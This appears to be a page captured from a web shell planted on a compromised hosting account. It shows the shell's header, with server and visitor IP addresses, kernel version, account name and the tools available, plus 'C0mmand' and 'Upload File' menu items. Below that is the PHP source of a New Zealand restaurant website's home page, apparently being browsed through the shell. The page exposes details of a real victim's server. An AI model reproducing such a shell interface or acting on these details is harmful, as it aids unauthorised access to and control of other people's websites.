Server IP : 103.53.40.154 / Your IP : 18.116.43.109 Web Server : Apache System : Linux md-in-35.webhostbox.net 4.19.286-203.ELK.el7.x86_64 #1 SMP Wed Jun 14 04:33:55 CDT 2023 x86_64 User : ppcad7no ( 715) PHP Version : 8.2.25 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON Directory (0750) : /home2/ppcad7no/snackpoint.co.nz/ |
[ Home ] | [ C0mmand ] | [ Upload File ] |
---|
<!DOCTYPE html> <html lang="en"> <head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <?php include("top-links.php") ?> <title><?php echo $datahome["site_pages_meta_title"];?></title> <meta name="description" content="<?php echo $datahome["site_pages_meta_description"];?>"> </head> <body> <?php include "header.php";?> <?php include "home-banner.php";?> <?php include "menu-2.php";?> <?php include "home-abt.php";?> <?php include "home-menu.php";?> <?php //include "home-counter.php";?> <?php include "home-cta.php";?> <?php include "home-booking.php";?> <?php include "home-testi.php";?> <?php include "home-blogs.php";?> <?php include "footer.php";?> </body> </html>